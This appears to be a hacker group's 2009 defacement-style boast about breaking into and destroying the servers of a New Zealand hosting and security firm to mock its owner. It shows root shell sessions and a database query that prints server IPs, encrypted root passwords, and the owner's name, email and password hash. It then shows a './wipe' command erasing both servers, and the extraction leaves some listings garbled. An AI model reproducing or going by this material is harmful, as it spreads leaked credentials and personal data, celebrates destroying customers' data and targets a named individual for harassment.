Some of you have seen a lot of casualties lately in the webhosting scene:
hosting companies being wiped and rm'd at the expense of their clients. While
some of this is collateral damage, we're about to show you, ladies and
gentlemen, that sometimes you aren't pwned because of who you host but what you
say.
Practice what you preach.
- Why SSANZ?
SSANZ is owned by a kid who claims he can manage, secure and audit servers.
He offers a service that he clearly cannot provide, and we are against that.
LoganNZ <http://www.webhostingtalk.com/member.php?u=56008>:
>>Logan of New Zealand. CEO of Server Systems Administration NZ.
>>
>> Signature:
>>Server Systems Administration NZ | SSANZ
>>Got Hacked? | 24/7/365 Remote Emergency Support | Specialist Server Management
>>Affordable Hosting :: Resellers, Shared & Dedicated Server Systems
Server Management $25 - Security & Hardening - $50 <http://www.webhostingtalk.com/showthread.php?t=857383>:
>>Server Management - $25 Per Month
>>
>>- Full Management - Support, & 3rd Party Installs
>>- Monitoring - Included - up to 3 ports.
>>- Emergency Recovery
>>Server Security - $50
>>
>>- Initial Scan & Report
>>- Security Hardening & Security Installs/tweaks.
>>- IDS, Security Monitoring & mod_sec configured.
>>- Finishing Security Scan & SSANZ Custom Scans.
>>
>>
>>Emergency Server Recovery - $150
>>
>>- Recover Hacked Server Systems
>>- Recover deleted data
>>- ANTI-dDOS Services
>>- dDOS Investigation
sh-3.2# ls -la
[mode column of the first 33 entries not recoverable from the extraction]
           24 root     root        4096 Jul  4 03:43 .
           27 root     root        4096 Jun 27 02:49 ..
            1 root     root         957 Jun 13 07:24 .accesshash
            1 root     root        1012 Jun  1 10:39 anaconda-ks.cfg
            1 root     root       15460 Jul  3 23:38 .bash_history
            1 root     root          24 Jan  6  2007 .bash_logout
            1 root     root         191 Jan  6  2007 .bash_profile
            1 root     root         176 Jan  6  2007 .bashrc
            3 therockm therockm    4096 Jun  5 07:26 bwm-ng-0.6
            1 root     root      141564 Mar  1  2007 bwm-ng-0.6.tar.gz
            3 root     root        4096 Nov 15  2006 cmm
            1 root     root       18656 Feb 28 11:32 cmm.tgz
            3 root     root        4096 Nov  5  2006 cmq
            1 root     root       14507 Oct 10  2008 cmq.tgz
            4 root     root        4096 Jun  1 14:33 .cpanel
            4 root     root        4096 Jun  1 17:10 cpanel3-skel
            3 root     root        4096 Jun  1 13:50 .cpobjcache
           10 root     root        4096 Apr 13 16:17 csf
            1 root     root      430121 May 15 12:07 csf.tgz
            1 root     root         100 Jan  6  2007 .cshrc
            2 root     root        4096 Jun  1 13:54 .elinks
            1 root     root     1176672 Jul  4 03:40 error_log
            1 root     root          16 Jun  3 08:34 .forward
            3 root     root        4096 Jun  1 10:39 .gconf
            2 root     root        4096 Jun  1 10:39 .gconfd
            4 root     root        4096 Jun 10 23:42 .gem
            2 root     root        4096 Jun  1 13:55 .gnupg
            5 theweath theweath    4096 Jun  1 17:13 htop-0.8.1
            1 root     root      414870 Sep 23  2008 htop-0.8.1.tar.gz
            1 root     root         561 Jun 27 02:48 .htoprc
            1 root     root        8144 Jun  6 19:23 index.html
            1 root     root        4246 Jun  1 10:39 install.log.syslog
            6 500      root        4096 Sep 13  2005 iptraf-3.0.0
-rw-r--r--  1 root     root           0 Jun 27 09:21 iptraf-3.0.0.tar.gz
-rw-r--r--  1 root     root           0 Jun 27 09:22 iptraf-3.0.0.tar.gz.1
-rw-r--r--  1 root     root           0 Jun 27 09:24 iptraf-3.0.0.tar.gz.2
-rw-r--r--  1 root     root      575169 Jun 27 09:26 iptraf-3.0.0.tar.gz.3
drwx------  6 root     root        4096 Jun  1 14:21 .MirrorSearch
-rw-------  1 root     root          61 Jun 12 21:04 .my.cnf
-rw-------  1 root     root         139 Jul  3 10:51 .mysql_history
-rwxrwxrwx  1 root     root       38688 Dec  1  2008 mysqltuner.pl
-rw-r--r--  1 root     root         264 Jul  2 21:43 .pearrc
drwxr-xr-x  2 root     root        4096 Jun  1 17:04 public_ftp
drwxr-xr-x  3 root     root        4096 Jun  1 17:04 public_html
-rw-------  1 root     root        1024 Jun  7 19:50 .rnd
drwx------  3 root     root        4096 Jun  1 14:29 .spamassassin
drwx------  2 root     root        4096 Jun  2 06:41 .ssh
-rw-r--r--  1 root     root         129 Jan  6  2007 .tcshrc
drwxr-xr-x  3 root     root        4096 Jun  7 21:54 tmp
-rw-------  1 root     root           0 Jun  7 22:01 .trustwavereqs
drwx------  2 root     root        4096 Jun  3 08:18 whmrbackups
drwx------  3 root     root        4096 Jun 10 08:25 whmrcorebackups
| grep -v Never
Port     From              Latest
pts/1    125.238.144.224   Fri Jul  3 20:27:03 -0400 2009
pts/0    118.69.80.114     Fri Jun 12 00:22:04 -0400 2009
pts/1    118.90.48.0       Sun Jun 21 04:44:58 -0400 2009
pts/0    189.31.24.129     Sat Jun 20 10:14:51 -0400 2009
sh-3.2# cd ~billing
sh-3.2# ls -la
total 301252
drwx--x--x 15 billing
drwx--x--x 737 root
lrwxrwxrwx 1 billing
pache/domlogs/billing
-rw------- 1 billing
illing.tar.gz
-rw------- 1 billing
illing.tar.gz
-rw------- 1 billing
lling.tar.gz
-rw------- 1 billing
-rw-r--r-- 1 billing
-rw-r--r-- 1 billing
-rw-r--r-- 1 billing
-rw------- 1 billing
drwxr-xr-x 5 billing
-rw-r----- 1 billing
drwxr-xr-x 2 billing
drwxr-xr-x 3 billing
drwxr-xr-x 2 billing
-rw-r--r-- 1 billing
drwxr-x--- 4 billing
drwxr-x--- 2 billing
-rw-r--r-- 1 billing
-rw------- 1 billing
drwxrwx--- 10 billing
drwxr-xr-x 4 billing
drwxr-xr-x 3 billing
drwxr-x--- 24 billing
drwx------ 4 billing
drwxr-xr-x 7 billing
drwx------ 2 billing
lrwxrwxrwx 1 billing
-rw-r--r-- 1 billing
billing
root
billing
sh-3.2# cd www/
sh-3.2# ls
admin
init.php
banned.php
logout.php
viewticket.php whois.php
affiliates.php
billing
installmingchowping modules
_vti_bin
aff.php
cart.php
knowledgebase.php
networkissues.php
_vti_cnf
announcements.php
cgi-bin
lang
networkissuesrss.php
_vti_inf.html
announcementsrss.php clientarea.php
libs
order.php
_vti_log
announcements.xml
configuration.php
link.php
passwordreminder.php
configuressl.php domainchecker.php
postinfo.html
templates
contact.php
_private
downloads
templates_c
creditcard.php
register.php
downloads.php
tutorials.php
dbconnect.php
htaccess.txt
serverstatus.php
upgrade
display.php
status
images
upgrade.php
dl.php
includes
submitticket.php
viewemail.php
_vti_pvt
attachments
login.php
_vti_txt
configuration.php.new dologin.php
index.php
pipe
supporttickets.php viewinvoice.php
| tblcontacts                |
| tblcredit                  |
| tblcurrencies              |
| tblcustomfields            |
| tblcustomfieldsvalues      |
| tbldomainpricing           |
| tbldomains                 |
| tbldomainsadditionalfields |
| tbldownloadcats            |
| tbldownloads               |
| tblemails                  |
| tblemailtemplates          |
| tblfraud                   |
| tblgatewaylog              |
| tblhosting                 |
| tblhostingaddons           |
| tblhostingconfigoptions    |
| tblinvoiceitems            |
| tblinvoices                |
| tblknowledgebase           |
| tblknowledgebasecats       |
| tblknowledgebaselinks      |
| tbllinks                   |
| tblnetworkissues           |
| tblnotes                   |
| tblorders                  |
| tblpaymentgateways         |
| tblpricing                 |
| tblproductconfiggroups     |
| tblproductconfiglinks      |
| tblproductconfigoptions    |
| tblproductconfigoptionssub |
| tblproductgroups           |
| tblproducts                |
| tblpromotions              |
| tblquoteitems              |
| tblquotes                  |
| tblregistrars              |
| tblservers                 |
| tblsslorders               |
| tbltax                     |
| tblticketbreaklines        |
| tblticketdepartments       |
| tblticketescalations       |
| tblticketlog               |
| tblticketmaillog           |
| tblticketnotes             |
| tblticketpredefinedcats    |
| tblticketpredefinedreplies |
| tblticketreplies           |
| tbltickets                 |
| tblticketspamfilters       |
| tbltodolist                |
| tblupgrades                |
| tblwhoislog                |
+----------------------------+
80 rows in set (0.00 sec)
mysql> select name,ipaddress,hostname,username,password from tblservers;
+--------------+----------------+------------------+----------+--------------------------------------------------------------------------+
| name         | ipaddress      | hostname         | username | password                                                                 |
+--------------+----------------+------------------+----------+--------------------------------------------------------------------------+
| Osiris       | 66.197.143.133 | Osiris.ssanz.net | ssanz    | J4WILwNJpxR0KhyuPspLOT37zLzLrZ1wyqctabXg3co=                             |
| Osiris-Radio | 66.197.143.133 | Osiris.ssanz.net | root     | +V876e3z7tGn9HXEcOG1TJVPaSsGbj31MnsZ2lw52buNutqcpfBhrPVsKdDssqrh7eDF8g== |
| Devil        | 66.197.204.101 | devil.ssanz.net  | root     | n/a/WSvQJp/++la5CREbl9QijpppzdxP0GjijQRXst2nag9E9PuTVrRO3A==             |
+--------------+----------------+------------------+----------+--------------------------------------------------------------------------+
3 rows in set (0.00 sec)
mysql> select firstname,lastname,email,username,password from tbladmins;
+-----------+----------+-----------------+----------+----------------------------------+
| firstname | lastname | email           | username | password                         |
+-----------+----------+-----------------+----------+----------------------------------+
| Logan     | Douglas  | Logan@ssanz.net | Admin    | c6df529826cf16ac5bedb424d8ac972b |
+-----------+----------+-----------------+----------+----------------------------------+
1 row in set (0.06 sec)
mysql> quit
Bye
sh-3.2# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda5             2.0G  477M  1.4G  26% /
/dev/sda8             875G  147G  684G  18% /home
/dev/sda3             9.7G  6.8G  2.5G  74% /usr
/dev/sda2             9.7G  7.0G  2.3G  76% /var
/dev/sda1              99M   23M   72M  24% /boot
/dev/sda6             996M   64M  881M   7% /tmp
tmpfs                 3.9G     0  3.9G   0% /dev/shm
/dev/sdb1             459G  163G  273G  38% /backup
sh-3.2# ./wipe
sh-3.2# df -h
Filesystem
/dev/sda5
/dev/sda8
/dev/sda3
/dev/sda2
/dev/sda1
/dev/sda6
tmpfs
/dev/sdb1
sh-3.2# exit
exit
----------------------------------
osiris  [ DOWN ]
devil   [ UP ]
sh-3.2# ls -la
[mode column not recoverable from the extraction]
           23 root root   4096 Jul  4 04:06 .
           25 root root   4096 Jun 29 14:33 ..
            1 root root    957 Jun 13 05:20 .accesshash
            1 root root    937 Jun 12 00:01 anaconda-ks.cfg
            1 root root   7258 Jun 30 10:03 .bash_history
            1 root root     24 Jan  6  2007 .bash_logout
            1 root root    191 Jan  6  2007 .bash_profile
            1 root root    176 Jan  6  2007 .bashrc
            3 1000 1000   4096 Jun 12 04:45 bwm-ng-0.6
            1 root root 141564 Mar  1  2007 bwm-ng-0.6.tar.gz
            3 root root   4096 Nov  5  2006 cmq
            1 root root  14507 Oct 10  2008 cmq.tgz
            4 root root   4096 Jun 12 02:51 .cpanel
            4 root root   4096 Jun 12 03:26 cpanel3-skel
            3 root root   4096 Jun 12 00:17 .cpobjcache
            2 root root   4096 Aug 21  2006 cse
            1 root root  12207 Oct 10  2008 cse.tgz
           10 root root   4096 Jun  5 05:05 csf
            1 root root 431490 Jun  5 10:52 csf.tgz
            1 root root    100 Jan  6  2007 .cshrc
            2 root root   4096 Jun 12 01:51 .elinks
            1 root root     16 Jun 13 15:33 .forward
| uniq -c
| uniq -c
| uniq -c
| uniq -c
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.38.206.233
csf --restart
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 118.94.59.33
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
[snip]
screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Live/i686/Fedora-11-i686-Live.iso
screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Fedora/x86_64/iso/Fedora-11-x86_64-DVD.iso
screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Fedora/x86_64/iso/Fedora-11-x86_64-netinst.iso
sh-3.2# cat /etc/userdomains
advertising.ssanz.net: adserver
forums.visit4cash.net: forumsv4
megacashzone.com: megacash
visit4cash.net: visit4ca
seanone.com: seanonec
backup2.ssanz.net: backup2
*: nobody
sh-3.2# df -h
Filesystem
/dev/sda3
/dev/sdb1
/dev/sda1
tmpfs
/usr/tmpDSK
sh-3.2# who
root     pts/0
sh-3.2# ./wipe
sh-3.2# df -h
Filesystem
/dev/sda3
/dev/sdb1
/dev/sda1
tmpfs
/usr/tmpDSK
sh-3.2# exit
exit
----------------------------------
osiris  [ DOWN ]
devil   [ DOWN ]
----------------------------------
Once again, practice what you preach. Don't claim to be something you're not.
Most importantly, don't go after us. We're not the problem. What you say does
not align AT ALL with what you actually do with your servers.
Fix that first, you dig?
~ There will always be no way out.